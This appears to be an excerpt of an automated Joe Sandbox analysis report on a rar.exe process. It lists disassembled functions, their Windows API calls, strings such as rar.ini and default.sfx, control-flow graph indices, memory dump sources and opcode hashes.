                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: H9
                                                                                                                                                                                                                                        • API String ID: 0-2207570329
                                                                                                                                                                                                                                        • Opcode ID: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
                                                                                                                                                                                                                                        • Instruction ID: 03650d88d8166d30494b4e3a809dc382f25ac469b11ff2364c067007cd70cfd3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DE1E362A0AA92D5EB12DB24E084BFD27E5FB4978CF494576CE0D83785DF38E946C300
                                                                                                                                                                                                                                        Function 00007FF6AA1A2574 Relevance: 7.6, APIs: 5, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1858 7ff6aa1a2574-7ff6aa1a259c 1859 7ff6aa1a259e-7ff6aa1a25a0 1858->1859 1860 7ff6aa1a25a5-7ff6aa1a25a9 1858->1860 1861 7ff6aa1a273a-7ff6aa1a2756 1859->1861 1862 7ff6aa1a25ab-7ff6aa1a25b6 GetStdHandle 1860->1862 1863 7ff6aa1a25ba-7ff6aa1a25c6 1860->1863 1862->1863 1864 7ff6aa1a2619-7ff6aa1a2637 WriteFile 1863->1864 1865 7ff6aa1a25c8-7ff6aa1a25cd 1863->1865 1866 7ff6aa1a263b-7ff6aa1a263e 1864->1866 1867 7ff6aa1a25cf-7ff6aa1a2609 WriteFile 1865->1867 1868 7ff6aa1a2644-7ff6aa1a2648 1865->1868 1866->1868 1869 7ff6aa1a2733-7ff6aa1a2737 1866->1869 1867->1868 1871 7ff6aa1a260b-7ff6aa1a2615 1867->1871 1868->1869 1870 7ff6aa1a264e-7ff6aa1a2652 1868->1870 1869->1861 1870->1869 1872 7ff6aa1a2658-7ff6aa1a2692 GetLastError call 7ff6aa1a3144 SetLastError 1870->1872 1871->1867 1873 7ff6aa1a2617 1871->1873 1878 7ff6aa1a2694-7ff6aa1a26a2 1872->1878 1879 7ff6aa1a26bc-7ff6aa1a26d0 call 7ff6aa19c95c 1872->1879 1873->1866 1878->1879 1880 7ff6aa1a26a4-7ff6aa1a26ab 1878->1880 1884 7ff6aa1a2721-7ff6aa1a272e call 7ff6aa19cf14 1879->1884 1885 7ff6aa1a26d2-7ff6aa1a26db 1879->1885 1880->1879 1883 7ff6aa1a26ad-7ff6aa1a26b7 call 7ff6aa19cf34 1880->1883 1883->1879 1884->1869 1885->1863 1887 7ff6aa1a26e1-7ff6aa1a26e3 1885->1887 1887->1863 1889 7ff6aa1a26e9-7ff6aa1a271c 1887->1889 1889->1863
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3350704910-0
                                                                                                                                                                                                                                        • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                        • Instruction ID: 1e79137ee4232d0bee9d2a78e0708f5fc35677f5baf0f920617faf4ae9545292
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5851B436B0A641D7EA65DF21E51437A6361FF54B84F040176DE8E87AA0DF3CE94BC600
                                                                                                                                                                                                                                        Function 00007FF6AA1A1E80 Relevance: 7.6, APIs: 5, Instructions: 127filetimeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1894 7ff6aa1a1e80-7ff6aa1a1ebb call 7ff6aa1da5a0 1897 7ff6aa1a1ec8 1894->1897 1898 7ff6aa1a1ebd-7ff6aa1a1ec1 1894->1898 1900 7ff6aa1a1ecb-7ff6aa1a1f57 CreateFileW 1897->1900 1898->1897 1899 7ff6aa1a1ec3-7ff6aa1a1ec6 1898->1899 1899->1900 1901 7ff6aa1a1f59-7ff6aa1a1f76 GetLastError call 7ff6aa1b4534 1900->1901 1902 7ff6aa1a1fcd-7ff6aa1a1fd1 1900->1902 1912 7ff6aa1a1f78-7ff6aa1a1fb6 CreateFileW GetLastError 1901->1912 1913 7ff6aa1a1fba 1901->1913 1904 7ff6aa1a1fd3-7ff6aa1a1fd7 1902->1904 1905 7ff6aa1a1ff7-7ff6aa1a200f 1902->1905 1904->1905 1909 7ff6aa1a1fd9-7ff6aa1a1ff1 SetFileTime 1904->1909 1906 7ff6aa1a2011-7ff6aa1a2022 call 7ff6aa1ca9e8 1905->1906 1907 7ff6aa1a2027-7ff6aa1a204b call 7ff6aa1da610 1905->1907 1906->1907 1909->1905 1912->1902 1915 7ff6aa1a1fb8 1912->1915 1916 7ff6aa1a1fbf-7ff6aa1a1fc1 1913->1916 1915->1916 1916->1902 1917 7ff6aa1a1fc3 1916->1917 1917->1902
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1999340476-0
                                                                                                                                                                                                                                        • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                        • Instruction ID: 0322803119e0d9ec8141d03b6b85cd74aff26cb3e3715ef3dd37e94b2b89c721
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0416872A0A68196FB618B24E4047B966A1AB447B8F00033ADE7D876C4DF7CC84ACB40
                                                                                                                                                                                                                                        Function 00007FF6AA196AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: swprintf
                                                                                                                                                                                                                                        • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                                        • API String ID: 233258989-2235180025
                                                                                                                                                                                                                                        • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                        • Instruction ID: 7ea973c71a602197774d9dc10188e8e3576a759b385ee162f2322f7bdece65f1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0341932171A682E1EB12DF21D9111F963A0EF447A4F840577EA6E83AD6EF3CED56C310
                                                                                                                                                                                                                                        Function 00007FF6AA1B7E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                                        • String ID: rar.lng
                                                                                                                                                                                                                                        • API String ID: 553376247-2410228151
                                                                                                                                                                                                                                        • Opcode ID: f5f45c02768d803fe11a35ce9d04b870cc719eb69b462b359c900579caddd1c9
                                                                                                                                                                                                                                        • Instruction ID: beeedc7d1a5ff658db364a5f6c7df46bc3a066e756e9e834d0c867a604ed23f1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5f45c02768d803fe11a35ce9d04b870cc719eb69b462b359c900579caddd1c9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4418121E0F282E5FA16AB21A5111B963D1AF81754F4801BBD95ECB3D7CE2DEC07C754
                                                                                                                                                                                                                                        Function 00007FF6AA1B40A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SHGetMalloc.SHELL32(?,00000800,?,00007FF6AA1B4432,?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B40C4
                                                                                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B40DF
                                                                                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32 ref: 00007FF6AA1B40F1
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6AA1B413F,?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1A34A0
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6AA1B413F,?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1A34D5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                                        • String ID: WinRAR
                                                                                                                                                                                                                                        • API String ID: 977838571-3970807970
                                                                                                                                                                                                                                        • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                        • Instruction ID: 0d1ef053722b3b10ba6d957fcdb754c44dcb6913c6080a5710205ea372130545
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5219626B09B42D0EA529F22F9501BA5361EF89BD4F085077DF0E87766EE3CDC468700
                                                                                                                                                                                                                                        Function 00007FF6AA1E978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF6AA1E3CEF,?,?,00000000,00007FF6AA1E3CAA,?,?,00000000,00007FF6AA1E3FD9), ref: 00007FF6AA1E97A5
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6AA1E3CEF,?,?,00000000,00007FF6AA1E3CAA,?,?,00000000,00007FF6AA1E3FD9), ref: 00007FF6AA1E9807
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6AA1E3CEF,?,?,00000000,00007FF6AA1E3CAA,?,?,00000000,00007FF6AA1E3FD9), ref: 00007FF6AA1E9841
                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6AA1E3CEF,?,?,00000000,00007FF6AA1E3CAA,?,?,00000000,00007FF6AA1E3FD9), ref: 00007FF6AA1E986B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1557788787-0
                                                                                                                                                                                                                                        • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                        • Instruction ID: 1097f99c54c7f5a89809b273d2f6eaedac68ac84e43511fe8ce50c2a4adffb94
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A217121F0A795D1E6718F12A440139A6A8BF55BD0F08417ADE8EA3BA4EF3DD8528744
                                                                                                                                                                                                                                        Function 00007FF6AA1A1C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2244327787-0
                                                                                                                                                                                                                                        • Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                        • Instruction ID: 3019caede5723677348b626c6382e55fa9dcb4a035242a18ff0dafe38c71aa6d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2421C031E0A646E1EB628B21E40437962A2BF41BE4F1001B7EE5DC76C8CE3DDC8A8701
                                                                                                                                                                                                                                        Function 00007FF6AA1949F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: AFUM$default.sfx
                                                                                                                                                                                                                                        • API String ID: 0-2491287583
                                                                                                                                                                                                                                        • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                        • Instruction ID: 5e4f54c7e227e63aab325ca0c8e89fc58494672f4bee454c8433ce548f76b5ad
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
